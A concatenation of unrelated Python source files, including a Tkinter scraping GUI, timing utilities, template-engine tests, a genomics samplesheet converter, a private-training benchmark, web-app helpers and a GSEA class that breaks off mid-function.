if isinstance(object,EPICscrape.Fields):
object.set_id(self.project_ids[idx])
object.set_contact_name(PM_name.get())
object.set_contact_email(PM_email.get())
return object
elif isinstance(object,EPICscrape.NoLibraryMatch):
object.set_id(self.project_ids[idx])
object.set_contact_name(PM_name.get())
object.set_contact_email(PM_email.get())
return object
else:
object.set_id(self.project.get().upper())
object.set_contact_email(PM_email.get())
object.set_contact_name(PM_name.get())
return object
def save():
filename = filedialog.asksaveasfilename(initialdir="./Desktop", title="Select file",
filetypes=(("CSV files", "*.csv"), ("all files", "*.*")))
msg=EPICscrape.WriteTo(self.codify,str(filename)+'.csv')
if msg=="Done":
master.quit()
# done=ttk.Style().configure("f.Label", background="black", foreground="white", relief="raised")
# ttk.Label(master,text=msg,style="f.Label").grid_anchor(CENTER)
LabelStyle=ttk.Style().configure("TLabel",foreground="black",background="light grey",padding=5,border="black")
TopStyle=ttk.Style().configure("r.TFrame",background="light grey")
MidStyle=ttk.Style().configure("b.TFrame",background="blue")
BottomStyle=ttk.Style().configure("g.TFrame",background="white")
checkst=ttk.Style().configure('lg.TCheckbutton',background="light grey",padding=5)
for r in range(6):
self.master.rowconfigure(r, weight=1)
for c in range(4):
self.master.columnconfigure(c, weight=1)
TopFrame = ttk.Frame(master, borderwidth = 2,style="r.TFrame")
TopFrame.grid(row = 0, column = 0, rowspan = 3, columnspan = 4, sticky = W+E+N+S)
ttk.Label(TopFrame,text="Project Manager and their phone").grid(row=0,column=0, sticky=W+E+N+S)
ttk.Label(TopFrame,text="Project Manager email").grid(row=1,column=0, sticky=W+E+N+S)
ttk.Label(TopFrame,text="OER Project #").grid(row=3, column=0, sticky= W+N+E+S)
#Entry Fields
PM_name = Entry(TopFrame, width=100)
PM_name.grid(row=0,column=1,columnspan=5,sticky=W+E)
PM_email = Entry(TopFrame,width=100)
PM_email.grid(row=1, column=1, columnspan=3,sticky=W+E)
self.project= Entry(TopFrame, width=100)
self.project.grid(row=3,column=1, columnspan=2,sticky=W+E+N+S)
# try filling Entrys from stored info
try:
file = open("PM_contact.csv",'r')
user_em = file.readlines()
file.close()
PM_name.insert(0,user_em[0])
PM_email.insert(0,user_em[1])
except IOError:
PM_name.insert(0,"<NAME> at 212-788-7527")
PM_email.insert(0,"<EMAIL>")
# Remember Me box
var1= IntVar()
chk= ttk.Checkbutton(TopFrame,text= "Remember Me",variable=var1, style="lg.TCheckbutton")
chk.grid(row=2,column=1,columnspan=3)
self.Go= ttk.Button(TopFrame,text="Go",command=get_vcp)
self.Go.grid(row=4,column=1,columnspan=3,sticky=W+E+N+S)
var2=IntVar()
GoFast= ttk.Checkbutton(TopFrame,text="Use this number in my recipients list",variable=var2,style="lg.TCheckbutton")
GoFast.grid(row=4,column=0,sticky=W+E+N+S)
#the number of buttons will need to be created (with a for i in range (len_project_id_list))
#use lambda function?
#once clicked, these buttons will place that value in EPICscrape's first codify field
MidFrame = ttk.Frame(master, borderwidth = 5)
MidFrame.grid(row = 3, column = 0, rowspan = 2, columnspan = 4, sticky = W+E+N+S)
#sample [('15TMP0008M',0),('15EHAN008M',1),('15CVCP060M',2),('15TMP$$$8M',3),('15EH-AN008M',4),('15CVfds0M',5)]
ttk.Label(MidFrame,text="Choose the OER Project ID you'd like to use from EPIC").grid(pady=3,row=0,column=0,columnspan=4,sticky=N+S+E+W)
results = StringVar()
BottomFrame= ttk.Frame(master,borderwidth=2, style="g.TFrame")
BottomFrame.grid(row=5,column=0,rowspan=2,columnspan=4,sticky=N+S+E+W)
results_label=ttk.Label(BottomFrame, text="Here are your results:")
results_label.grid(row=0,column=0,sticky=N+E+W+S)
res_print= ttk.Label(BottomFrame,textvariable=results,wraplength=300,justify=LEFT)
res_print.grid(pady=5, row=1, column=0, columnspan=2, sticky=N + E + W + S)
last=7
ttk.Label(master, text= "What would you like to do?").grid(row=last,column=0,columnspan=2,sticky=N+E+W+S)
save_button = ttk.Button(master,text="save", command=save,state=DISABLED)
save_button.grid(row=last,column=2,sticky =N+W+E+S)
ttk.Button(master,text="quit", command=master.quit).grid(row=last,column=3,sticky=N+E+W+S)
#not working, setting everything up before hand
#span starts count from 1 not 0 i.e. normally counts
def main():
root = Tk()
root.geometry("550x550")
app = Application(master=root)
app.mainloop()
main()
"""
entry error
15cvcp0060m
5cvcp0060m
City, State creates a cell in csv formats ((just keep it separate.))
add PM_email header
create entry just for PM_phone
should write just
"""
| 2.78125
| 3
|
lib/tempora/timing.py
|
marcelveldt/script.module.cherrypy
| 2
|
12775635
|
<gh_stars>1-10
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import
import datetime
import functools
import numbers
import time
__metaclass__ = type
class Stopwatch:
"""
A simple stopwatch which starts automatically.
>>> w = Stopwatch()
>>> _1_sec = datetime.timedelta(seconds=1)
>>> w.split() < _1_sec
True
>>> import time
>>> time.sleep(1.0)
>>> w.split() >= _1_sec
True
>>> w.stop() >= _1_sec
True
>>> w.reset()
>>> w.start()
>>> w.split() < _1_sec
True
It should be possible to launch the Stopwatch in a context:
>>> with Stopwatch() as watch:
... assert isinstance(watch.split(), datetime.timedelta)
In that case, the watch is stopped when the context is exited,
so to read the elapsed time::
>>> watch.elapsed
datetime.timedelta(...)
>>> watch.elapsed.seconds
0
"""
def __init__(self):
self.reset()
self.start()
def reset(self):
self.elapsed = datetime.timedelta(0)
if hasattr(self, 'start_time'):
del self.start_time
def start(self):
self.start_time = datetime.datetime.utcnow()
def stop(self):
stop_time = datetime.datetime.utcnow()
self.elapsed += stop_time - self.start_time
del self.start_time
return self.elapsed
def split(self):
local_duration = datetime.datetime.utcnow() - self.start_time
return self.elapsed + local_duration
# context manager support
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.stop()
class IntervalGovernor:
"""
Decorate a function to only allow it to be called once per
min_interval. Otherwise, it returns None.
"""
def __init__(self, min_interval):
if isinstance(min_interval, numbers.Number):
min_interval = datetime.timedelta(seconds=min_interval)
self.min_interval = min_interval
self.last_call = None
def decorate(self, func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
allow = (
not self.last_call
or self.last_call.split() > self.min_interval
)
if allow:
self.last_call = Stopwatch()
return func(*args, **kwargs)
return wrapper
__call__ = decorate
class Timer(Stopwatch):
"""
Watch for a target elapsed time.
>>> t = Timer(0.1)
>>> t.expired()
False
>>> __import__('time').sleep(0.15)
>>> t.expired()
True
"""
def __init__(self, target=float('Inf')):
self.target = self._accept(target)
super(Timer, self).__init__()
def _accept(self, target):
"Accept None or ∞ or datetime or numeric for target"
if isinstance(target, datetime.timedelta):
target = target.total_seconds()
if target is None:
# treat None as infinite target
target = float('Inf')
return target
def expired(self):
return self.split().total_seconds() > self.target
class BackoffDelay:
"""
Exponential backoff delay.
Useful for defining delays between retries. Consider for use
with ``jaraco.functools.retry_call`` as the cleanup.
Default behavior has no effect; a delay or jitter must
be supplied for the call to be non-degenerate.
>>> bd = BackoffDelay()
>>> bd()
>>> bd()
The following instance will delay 10ms for the first call,
20ms for the second, etc.
>>> bd = BackoffDelay(delay=0.01, factor=2)
>>> bd()
>>> bd()
Inspect and adjust the state of the delay anytime.
>>> bd.delay
0.04
>>> bd.delay = 0.01
Set limit to prevent the delay from exceeding bounds.
>>> bd = BackoffDelay(delay=0.01, factor=2, limit=0.015)
>>> bd()
>>> bd.delay
0.015
Limit may be a callable taking a number and returning
the limited number.
>>> at_least_one = lambda n: max(n, 1)
>>> bd = BackoffDelay(delay=0.01, factor=2, limit=at_least_one)
>>> bd()
>>> bd.delay
1
Pass a jitter to add or subtract seconds to the delay.
>>> bd = BackoffDelay(jitter=0.01)
>>> bd()
>>> bd.delay
0.01
Jitter may be a callable. To supply a non-deterministic jitter
between -0.5 and 0.5, consider:
>>> import random
>>> jitter=functools.partial(random.uniform, -0.5, 0.5)
>>> bd = BackoffDelay(jitter=jitter)
>>> bd()
>>> 0 <= bd.delay <= 0.5
True
"""
delay = 0
factor = 1
"Multiplier applied to delay"
jitter = 0
"Number or callable returning extra seconds to add to delay"
def __init__(self, delay=0, factor=1, limit=float('inf'), jitter=0):
self.delay = delay
self.factor = factor
if isinstance(limit, numbers.Number):
limit_ = limit
def limit(n):
return max(0, min(limit_, n))
self.limit = limit
if isinstance(jitter, numbers.Number):
jitter_ = jitter
def jitter():
return jitter_
self.jitter = jitter
def __call__(self):
time.sleep(self.delay)
self.delay = self.limit(self.delay * self.factor + self.jitter())
| 3.734375
| 4
|
MiniTemple/test.py
|
Lattay/MiniTemple
| 0
|
12775636
|
<reponame>Lattay/MiniTemple<filename>MiniTemple/test.py
import unittest
from MiniTemple import (
Template,
compile_text,
render_text
)
class TestTemple(unittest.TestCase):
def __init__(self, arg):
unittest.TestCase.__init__(self, arg)
self.maxDiff = None
def test_render_text(self):
# Simple copy
self.assertEqual('Nothing special', render_text('Nothing special', {}))
# Print variable
self.assertEqual('A variable !',
render_text('<%= a_var %>', {'a_var' : 'A variable !'}))
# If statement
tmpl = '''<% if a_bool: %>OK<% else: %>Nope'''
self.assertEqual('OK', render_text(tmpl, {'a_bool' : True}))
self.assertEqual('Nope', render_text(tmpl, {'a_bool' : False}))
# Loop statement
tmpl = '<% for i in range(n): echo(i) %>'
self.assertEqual('0\n1\n2\n3\n', render_text(tmpl, {'n' : 4}))
def test_compile_text(self):
        # reproducibility
tmpl = '''
Here is a slightly more complex example.
Indeed it should show <%= some_var %> and also
<% for i in l :
if i % 2:
write(i)
# some loops
#end
#end
%>
The purpose is to test in one shot the mecanisms of <% write(name) %>
because what is important here is that <%= func_name %> reproduce
same results with same entries.
'''
res_exp = '''
Here is a slightly more complex example.
Indeed it should show some variable and also
1357
The purpose is to test in one shot the mecanisms of MiniTemple
because what is important here is that compile_text reproduce
same results with same entries.
'''
t = compile_text(tmpl)
res1 = t.render(
some_var='some variable',
l=[1,2,3,4,5,6,7,8],
name='MiniTemple',
func_name='compile_text'
)
self.assertEqual(res_exp, res1)
res2 = t.render(
some_var='some variable',
l=[1,2,3,4,5,6,7,8],
name='MiniTemple',
func_name='compile_text'
)
self.assertEqual(res1, res2)
def test_error(self):
tmpl = '''
<% if a_bool: %>
OK
<% #end %>
<% else: %>
Nope'''
try:
render_text(tmpl, {'a_bool' : False})
except Exception as e:
self.assertIsInstance(e, SyntaxError)
else:
self.fail("Here should have been an error.")
if __name__ == '__main__':
unittest.main()
| 2.9375
| 3
|
python_tools/pipeline_kickoff/create_title_file_from_samplesheet.py
|
mskcc/ACCESS-Pipeline
| 4
|
12775637
|
<reponame>mskcc/ACCESS-Pipeline
#!/usr/bin/env python
import xlrd
import argparse
import pandas as pd
from python_tools.constants import *
# Suppress pandas copy warning
pd.options.mode.chained_assignment = None
##################################
# Pipeline Kickoff Step #1
#
# This module is used to create a title file with the information needed for a pipeline run
# It is derived from the manually-curated sample samplesheet
#
# Usage example:
#
# create_title_file_from_samplesheet \
# -i ./SampleSheet.csv \
# -o ./title_file.txt
#
# Note: The following requirements will be imposed on the input samplesheet file:
#
# 1. The fields found in the samplesheet should match the examples in test/test_data
# 2. The sample IDs in the samplesheet must be matched somewhere in the fastq file names from the -d data folder
# 3. The sample IDs in the samplesheet must be matched somewhere in the path to the SampleSheet.csv files
# 4. The SAMPLE_CLASS column of the samplesheet must consist of the values either "Tumor" or "Normal"
# 5. Each "Tumor" sample must have at least one associated "Normal" sample
# 6. Each sample folder in the -d data folder must have these three files:
#
# '_R1_001.fastq.gz'
# '_R2_001.fastq.gz'
# 'SampleSheet.csv'
def create_title_file(samplesheet_file_path, output_filename):
"""
Main function to read sample sheet, perform checks
"""
### Read samplesheet as either csv or Excel file ###
try:
samplesheet = pd.read_csv(samplesheet_file_path, sep=",", header=0, dtype=str)
except (xlrd.biffh.XLRDError, pd.io.common.CParserError):
samplesheet = pd.read_excel(samplesheet_file_path, sep=",")
# Remove rows where all elements are missing
samplesheet = samplesheet.dropna(axis=0, how="all")
samplesheet = samplesheet.replace("\n", "", regex=True)
### resolve columns values ###
# Check for duplicate columns
if not samplesheet.equals(samplesheet.loc[:, ~samplesheet.columns.duplicated()]):
raise Exception("Duplicated column headers in samplesheet.")
# Check for required columns
if not set(SAMPLE_SHEET_REQUIRED_COLUMNS) <= set(samplesheet.columns.tolist()):
        missing_columns = set(SAMPLE_SHEET_REQUIRED_COLUMNS) - set(
            samplesheet.columns.tolist()
        )
raise Exception(
"SampleSheet is missing the following required columns: {}.".format(
",".join(missing_columns)
)
)
# Check for optional columns
if set(SAMPLE_SHEET_REQUIRED_COLUMNS + SAMPLE_SHEET_OPTIONAL_COLUMNS) < set(
samplesheet.columns.tolist()
):
        unrecognized_columns = set(samplesheet.columns.tolist()) - set(
            SAMPLE_SHEET_REQUIRED_COLUMNS + SAMPLE_SHEET_OPTIONAL_COLUMNS
        )
        print(
            "WARNING: SampleSheet has additional unrecognized columns: {}".format(
                ",".join(unrecognized_columns)
            )
        )
elif set(SAMPLE_SHEET_REQUIRED_COLUMNS + SAMPLE_SHEET_OPTIONAL_COLUMNS) > set(
samplesheet.columns.tolist()
):
        missing_columns = set(
            SAMPLE_SHEET_REQUIRED_COLUMNS + SAMPLE_SHEET_OPTIONAL_COLUMNS
        ) - set(samplesheet.columns.tolist())
        print(
            "WARNING: SampleSheet is missing the following optional columns: {}".format(
                ",".join(missing_columns)
            )
        )
### resolve row values ###
# Check if required column values are populated for all rows
if not samplesheet.equals(samplesheet.dropna(subset=SAMPLE_SHEET_REQUIRED_COLUMNS)):
raise Exception("Missing values in require columns.")
# Select the explicitly defined columns we want from the samplesheet & rename them
try:
title_file = samplesheet[columns_map_samplesheet.keys()]
except KeyError:
raise Exception("Cannot map sample sheet columns to title file.")
title_file.columns = columns_map_samplesheet.values()
# populate title file barcode column
try:
title_file[TITLE_FILE__BARCODE_ID_COLUMN] = [
barcode_x if barcode_x == barcode_y else barcode_x + "_" + barcode_y
for barcode_x, barcode_y in zip(
samplesheet[SAMPLE_SHEET__BARCODE_ID1_COLUMN],
samplesheet[SAMPLE_SHEET__BARCODE_ID2_COLUMN],
)
]
except (KeyError, ValueError):
raise Exception("Error while populating barcode values in the title file.")
# check for projectID and bait version
def projectid_format(id):
"""
helper function to check project ID and extract bait version.
"""
if PROJECT_NAME.match(id):
try:
return BAIT_SEARCH.findall(id).pop().replace(ASSAY_NAME, "")
except IndexError:
raise Exception(
"Bait version cannot be identified from project/run ID."
)
else:
raise Exception("Project ID is not in the required format.")
# Get bait version from project ID and perform check
title_file[TITLE_FILE__BAIT_VERSION_COLUMN] = title_file[
TITLE_FILE__POOL_COLUMN
].apply(projectid_format)
if len(set(title_file[TITLE_FILE__BAIT_VERSION_COLUMN])) > 1:
raise Exception("Samplesheet contains samples with mutliple bait version.")
if (
not set(title_file[TITLE_FILE__BAIT_VERSION_COLUMN]).pop()
== EXPECTED_BAIT_VERSION
):
raise Exception("Samplesheet bait version does not match the expected value.")
# sample description/class check
if not set(title_file[TITLE_FILE__SAMPLE_CLASS_COLUMN]) <= set(
ALLOWED_SAMPLE_DESCRIPTION
):
raise Exception(
"Unexpected sample description. Only the following sample descritpions are allowed: {}.".format(
",".join(ALLOWED_SAMPLE_DESCRIPTION)
)
)
# split metadata column
try:
title_file[
[
TITLE_FILE__PATIENT_NAME_COLUMN,
TITLE_FILE__ACCESSION_COLUMN,
TITLE_FILE__SEX_COLUMN,
TITLE_FILE__SEQUENCER_COLUMN,
]
] = samplesheet[SAMPLE_SHEET__METADATA_COLUMN].str.split(
METADATA_COLUMN_DELIMETER, expand=True
)[
METADATA_REQUIRED_COLUMNS
]
except (ValueError, KeyError):
raise Exception(
"Operator column values are improperly defined. There should be at least 5 '|' delimited fields in this order: OperatorName|PatientName|Accession|Sex|Sequencer"
)
# SEX column makes sense?
title_file.loc[
title_file[TITLE_FILE__SEX_COLUMN].isin(CONTROL_SAMPLE_SEX),
TITLE_FILE__SEX_COLUMN,
] = FEMALE
if not set(title_file[TITLE_FILE__SEX_COLUMN]) <= set(ALLOWED_SEX):
raise Exception(
"Unrecognized SEX type. Should be one of: {}.".format(
",".join(ALLOWED_SEX + CONTROL_SAMPLE_SEX)
)
)
# Check sequencer columns
if not set(title_file[TITLE_FILE__SEQUENCER_COLUMN]) <= set(ALLOWED_SEQUENCERS):
unrecognized_values = set(title_file[TITLE_FILE__SEQUENCER_COLUMN]) ^ set(
ALLOWED_SEQUENCERS
)
raise Exception(
"Unrecognized sequencer names: {}".format(",".join(unrecognized_values))
)
if len(set(title_file[TITLE_FILE__SEQUENCER_COLUMN])) > 1:
raise Exception(
"Only one unique sequencer name is allowerd per title file. There are: {}".format(
",".join(set(title_file[TITLE_FILE__SEQUENCER_COLUMN]))
)
)
# check sample id and sample name format
def name_check(sampleid):
"""
helper function to validate sample IDs and names.
"""
if any([s1 in sampleid for s1 in DISALLOWED_SAMPLE_ID_CHARACTERS]):
raise Exception(
"Disallowed characters in {}. Ensure that none of the following characters exist: {}".format(
sampleid, DISALLOWED_SAMPLE_ID_CHARACTERS
)
)
title_file[TITLE_FILE__SAMPLE_ID_COLUMN].apply(name_check)
title_file[TITLE_FILE__PATIENT_ID_COLUMN].apply(name_check)
# infer sample type from sample id
try:
title_file[TITLE_FILE__SAMPLE_TYPE_COLUMN] = title_file[
TITLE_FILE__SAMPLE_ID_COLUMN
].str.split(SAMPLE_ID_ALLOWED_DELIMETER).str[SELECT_SPLIT_COLUMN]
except KeyError:
raise Exception(
"Error when interpreting sample type from sample_id. Ensure the sample-id are in the 00000000-X format."
)
# inferred sample type check
def sample_type_check(sample):
if not ALLOWED_SAMPLE_TYPE.match(sample):
raise Exception(
"Unknown sample type {}. Sample type should start with one of: {}".format(
sample, ",".join(ALLOWED_SAMPLE_TYPE_LIST)
)
)
title_file[TITLE_FILE__SAMPLE_TYPE_COLUMN].apply(sample_type_check)
# if not set(title_file[TITLE_FILE__SAMPLE_TYPE_COLUMN]) <= set(ALLOWED_SAMPLE_TYPE):
# raise Exception(
# "Unexpected sample type. Only the following sample types are allowed: {}.".format(
# ",".join(ALLOWED_SAMPLE_TYPE)
# )
# )
# Assign sample type
title_file[TITLE_FILE__SAMPLE_TYPE_COLUMN] = [
PLASMA if PLASMA_SAMPLE_TYPE.match(x) else BUFFY
for x in title_file[TITLE_FILE__SAMPLE_TYPE_COLUMN]
]
# constant columns
title_file[TITLE_FILE__COLLAB_ID_COLUMN] = COLLAB_ID
# Samplesheet does not include this information at the moment
# TODO: DMS can work out a way to fill this info if required.
title_file[TITLE_FILE__POOL_INPUT_COLUMN] = ""
# Trim whitespace
title_file = title_file.apply(lambda x: x.str.strip() if x.dtype == "object" else x)
# Optionally split by lanes
if len(title_file[TITLE_FILE__LANE_COLUMN].unique()) > 1:
duplicate_samples = []
for lane in title_file[TITLE_FILE__LANE_COLUMN].unique():
duplicate_samples.extend(
title_file[title_file[TITLE_FILE__LANE_COLUMN] == lane][
TITLE_FILE__SAMPLE_ID_COLUMN
].tolist()
)
duplicate_samples = list(
filter(lambda x: duplicate_samples.count(x) > 1, duplicate_samples)
)
columns_to_consider = title_file.columns.tolist()
columns_to_consider.remove(TITLE_FILE__LANE_COLUMN)
title_file = title_file.drop_duplicates(subset=columns_to_consider)
title_file[TITLE_FILE__LANE_COLUMN].loc[
title_file[TITLE_FILE__SAMPLE_ID_COLUMN].isin(duplicate_samples)
] = MERGED_LANE_VALUE
title_file = title_file[TITLE_FILE__COLUMN_ORDER]
title_file.to_csv(output_filename, sep="\t", index=False)
else:
title_file = title_file[TITLE_FILE__COLUMN_ORDER]
title_file.to_csv(output_filename, sep="\t", index=False)
########
# Main #
########
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"-i",
"--samplesheet_file_path",
help="Sample Manifest File (e.g. test_samplesheet.xlsx)",
required=True,
)
parser.add_argument(
"-o",
"--output_filename",
help="Desired output title location and name",
required=True,
)
args = parser.parse_args()
create_title_file(args.samplesheet_file_path, args.output_filename)
if __name__ == "__main__":
main()
| 2.34375
| 2
|
fast_torch_dp.py
|
lxuechen/fast-dpsgd
| 0
|
12775638
|
<gh_stars>0
'''
Opacus experiments for all the models
'''
import time
import torch
from torch import nn, optim
import data
from experimental.privacy_utils import autograd_grad_sample
from experimental.privacy_utils.privacy_engine import EfficientPrivacyEngine
from pytorch import get_data, model_dict
import utils
def main(args):
print(args)
assert args.dpsgd
torch.backends.cudnn.benchmark = True
mdict = model_dict.copy()
train_data, train_labels = get_data(args)
model = mdict[args.experiment](vocab_size=args.max_features, batch_size=args.batch_size).cuda()
optimizer = optim.SGD(model.parameters(), lr=args.learning_rate, momentum=0)
loss_function = nn.CrossEntropyLoss(reduction="none") if args.experiment != 'logreg' else nn.BCELoss(
reduction="none")
privacy_engine = EfficientPrivacyEngine(
model,
batch_size=args.batch_size,
sample_size=len(train_data),
alphas=[1 + x / 10.0 for x in range(1, 100)] + list(range(12, 64)),
noise_multiplier=args.sigma,
max_grad_norm=args.max_per_sample_grad_norm,
)
privacy_engine.attach(optimizer)
timings = []
for epoch in range(1, args.epochs + 1):
start = time.perf_counter()
dataloader = data.dataloader(train_data, train_labels, args.batch_size)
for batch_idx, (x, y) in enumerate(dataloader):
x, y = x.cuda(non_blocking=True), y.cuda(non_blocking=True)
outputs = model(x)
loss = loss_function(outputs, y)
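            # Two-pass backward used by this private-training setup: the first
            # backward (hooks in "norm" mode) is presumably used to collect
            # per-sample gradient norms, and the second backward (hooks in
            # "grad" mode) re-weights the loss with per-sample coefficients
            # from the privacy engine before the clipped, noised optimizer step.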
autograd_grad_sample.set_hooks_mode(mode="norm")
first_loss = loss.mean(dim=0)
first_loss.backward(retain_graph=True)
autograd_grad_sample.set_hooks_mode(mode="grad")
coef_sample = optimizer.privacy_engine.get_coef_sample()
second_loss = (coef_sample * loss).sum(dim=0)
second_loss.backward()
optimizer.step()
optimizer.zero_grad()
torch.cuda.synchronize()
duration = time.perf_counter() - start
print("Time Taken for Epoch: ", duration)
timings.append(duration)
if args.dpsgd:
epsilon, best_alpha = optimizer.privacy_engine.get_privacy_spent(args.delta)
print(f"Train Epoch: {epoch} \t"
f"(ε = {epsilon}, δ = {args.delta}) for α = {best_alpha}")
else:
print(f"Train Epoch: {epoch}")
if not args.no_save:
utils.save_runtimes(__file__.split('.')[0], args, timings)
else:
print('Not saving!')
print('Done!')
if __name__ == '__main__':
# python fast_torch_dp.py ffnn --dpsgd --batch_size 100000 --dummy_data --epochs 100000
parser = utils.get_parser(model_dict.keys())
parser.add_argument(
"--sigma",
type=float,
default=1.0,
help="Noise multiplier (default 1.0)",
)
parser.add_argument(
"-c",
"--max-per-sample-grad_norm",
type=float,
default=1.0,
help="Clip per-sample gradients to this norm (default 1.0)",
)
parser.add_argument(
"--delta",
type=float,
default=1e-5,
help="Target delta (default: 1e-5)",
)
args = parser.parse_args()
main(args)
| 2.109375
| 2
|
openslides_backend/action/actions/user/reset_password_to_default_temporary.py
|
r-peschke/openslides-backend
| 0
|
12775639
|
from typing import Any, Dict
from ...util.register import register_action
from .check_temporary_mixin import CheckTemporaryMixin
from .reset_password_to_default import UserResetPasswordToDefaultAction
@register_action("user.reset_password_to_default_temporary")
class UserResetPasswordToDefaultTemporaryAction(
CheckTemporaryMixin, UserResetPasswordToDefaultAction
):
"""
Action to reset a password to default of a temporary user.
"""
def update_instance(self, instance: Dict[str, Any]) -> Dict[str, Any]:
"""
Check for temporary user and call super().update_instance().
"""
self.check_for_temporary(instance)
return super().update_instance(instance)
| 2.546875
| 3
|
WebODM-master/app/templatetags/settings.py
|
abhinavsri000/UAVision
| 0
|
12775640
|
<gh_stars>0
import datetime
import logging
from django import template
register = template.Library()
logger = logging.getLogger('app.logger')
@register.simple_tag(takes_context=True)
def settings_image_url(context, image):
try:
img_cache = getattr(context['SETTINGS'], image)
except KeyError:
logger.warning("Cannot get SETTINGS key from context. Something's wrong in settings_image_url.")
return ''
try:
return "/media/" + img_cache.url
except FileNotFoundError:
logger.warning("Cannot get %s, this could mean the image was deleted." % image)
return ''
@register.simple_tag(takes_context=True)
def get_footer(context):
try:
settings = context['SETTINGS']
except KeyError:
logger.warning("Cannot get SETTINGS key from context. The footer will not be displayed.")
return ""
if settings.theme.html_footer == "": return ""
organization = ""
if settings.organization_name != "" and settings.organization_website != "":
organization = "<a href='{}'>{}</a>".format(settings.organization_website, settings.organization_name)
elif settings.organization_name != "":
organization = settings.organization_name
footer = settings.theme.html_footer
footer = footer.replace("{ORGANIZATION}", organization)
footer = footer.replace("{YEAR}", str(datetime.datetime.now().year))
return "<footer>" + \
footer + \
"</footer>"
| 2.203125
| 2
|
tests/test_configdict.py
|
kalekundert/wellmap
| 7
|
12775641
|
#!/usr/bin/env python3
from wellmap import *
def test_empty():
config = configdict({})
assert config.meta == {}
assert config.rows == {}
assert config.irows == {}
assert config.cols == {}
assert config.icols == {}
assert config.wells == {}
assert config.user == {}
def test_user():
config = configdict({'x': 1})
assert config.meta == {}
assert config.rows == {}
assert config.irows == {}
assert config.cols == {}
assert config.icols == {}
assert config.wells == {}
assert config.user == {'x': 1}
def test_meta():
config = configdict({'x': 1, 'meta': {'y': 2}})
assert config.meta == {'y': 2}
assert config.rows == {}
assert config.irows == {}
assert config.cols == {}
assert config.icols == {}
assert config.wells == {}
assert config.user == {'x': 1}
def test_rows():
config = configdict({'x': 1, 'row': {'y': 2}})
assert config.meta == {}
assert config.rows == {'y': 2}
assert config.irows == {}
assert config.cols == {}
assert config.icols == {}
assert config.wells == {}
assert config.user == {'x': 1}
def test_irows():
config = configdict({'x': 1, 'irow': {'y': 2}})
assert config.meta == {}
assert config.rows == {}
assert config.irows == {'y': 2}
assert config.cols == {}
assert config.icols == {}
assert config.wells == {}
assert config.user == {'x': 1}
def test_cols():
config = configdict({'x': 1, 'col': {'y': 2}})
assert config.meta == {}
assert config.rows == {}
assert config.irows == {}
assert config.cols == {'y': 2}
assert config.icols == {}
assert config.wells == {}
assert config.user == {'x': 1}
def test_icols():
config = configdict({'x': 1, 'icol': {'y': 2}})
assert config.meta == {}
assert config.rows == {}
assert config.irows == {}
assert config.cols == {}
assert config.icols == {'y': 2}
assert config.wells == {}
assert config.user == {'x': 1}
def test_wells():
config = configdict({'x': 1, 'well': {'y': 2}})
assert config.meta == {}
assert config.rows == {}
assert config.irows == {}
assert config.cols == {}
assert config.icols == {}
assert config.wells == {'y': 2}
assert config.user == {'x': 1}
def test_getattr():
config = configdict({})
config.meta['x'] = 1; assert config.meta == {'x': 1}
config.rows['x'] = 2; assert config.rows == {'x': 2}
config.irows['x'] = 3; assert config.irows == {'x': 3}
config.cols['x'] = 4; assert config.cols == {'x': 4}
config.icols['x'] = 5; assert config.icols == {'x': 5}
config.wells['x'] = 6; assert config.wells == {'x': 6}
def test_setattr():
config = configdict({})
config.meta = {'x': 1}; assert config['meta']['x'] == 1
config.rows = {'x': 2}; assert config['row']['x'] == 2
config.irows = {'x': 3}; assert config['irow']['x'] == 3
config.cols = {'x': 4}; assert config['col']['x'] == 4
config.icols = {'x': 5}; assert config['icol']['x'] == 5
config.wells = {'x': 6}; assert config['well']['x'] == 6
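# Taken together, test_getattr and test_setattr check that the attribute views
# (meta, rows, irows, cols, icols, wells) stay in sync with the underlying
# 'meta'/'row'/'irow'/'col'/'icol'/'well' keys of the wrapped dict.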
| 2.46875
| 2
|
test.py
|
jaeyeon-park/trackGitRepo
| 0
|
12775642
|
from trackGits import *
import os
def installTest():
"""
Test installView with install function
"""
global __CONFIG_NAME, __SRC_DIR
conf = os.path.join(__SRC_DIR,__CONFIG_NAME)
if not isInstalled(conf):
installed = installView(conf,installer=install)
if not installed: return False
else: return True
else:
return True
def addTest():
"""
Test addDir function
"""
global __CONFIG_NAME, __SRC_DIR
conf = os.path.join(__SRC_DIR,__CONFIG_NAME)
src = input("dirpath of git project")
addDir(src,conf)
| 2.734375
| 3
|
libgsea/extgsea.py
|
antonybholmes/libgsea
| 0
|
12775643
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 13 14:13:10 2018
@author: antony
"""
import numpy as np
import pandas as pd
import sys
import matplotlib
from matplotlib.colors import Normalize
import matplotlib.pyplot as plt
import matplotlib.transforms as transforms
import libplot
import matplotlib.gridspec as gridspec
# http://arep.med.harvard.edu/N-Regulation/Tolonen2006/GSEA/index.html
class ExtGSEA(object):
def __init__(self, ranked_gene_list, ranked_score, permutations=1000, w=1):
self.__w = w
self.__np = permutations
l = len(ranked_gene_list)
rk = np.concatenate((ranked_gene_list, ranked_gene_list))
rsc = np.concatenate((ranked_score, -ranked_score), axis=0)
ix = np.argsort(rsc)[::-1]
print(np.sort(rsc)[::-1])
pn = np.concatenate((np.ones(l), -np.ones(l)), axis=0)
self.__rk = ranked_gene_list
self.__rs = ranked_score
self.__rkc = rk[ix]
self.__rsc = rsc[ix]
self.__pn = pn[ix]
# Defaults if nothing found
self.__es = -1
self.__nes = -1
self.__pv = -1
self.__ledge = []
self.__bg = {}
self.__gsn1 = 'n1'
self.__gsn2 = 'n2'
self.__run = False
def enrichment_score(self, gs1):
l = len(self.__rk)
hits = np.zeros(l)
for i in range(0, l):
if self.__rk[i] in gs1:
hits[i] = 1
# Compute ES
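        # Weighted running-sum statistic: score_hit accumulates |score|**w over
        # genes in the set, score_miss accumulates over genes outside it; both
        # are normalised to end at 1, so their difference es_all is the running
        # enrichment curve.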
if self.__w != 1:
score_hit = np.cumsum(np.abs(self.__rs * hits) ** self.__w)
else:
score_hit = np.cumsum(np.abs(self.__rs * hits))
score_hit = score_hit / score_hit[-1]
score_miss = np.cumsum(1 - hits)
score_miss = score_miss / score_miss[-1]
es_all = score_hit - score_miss
es = np.max(es_all) + np.min(es_all)
isen = np.zeros(l)
if es < 0:
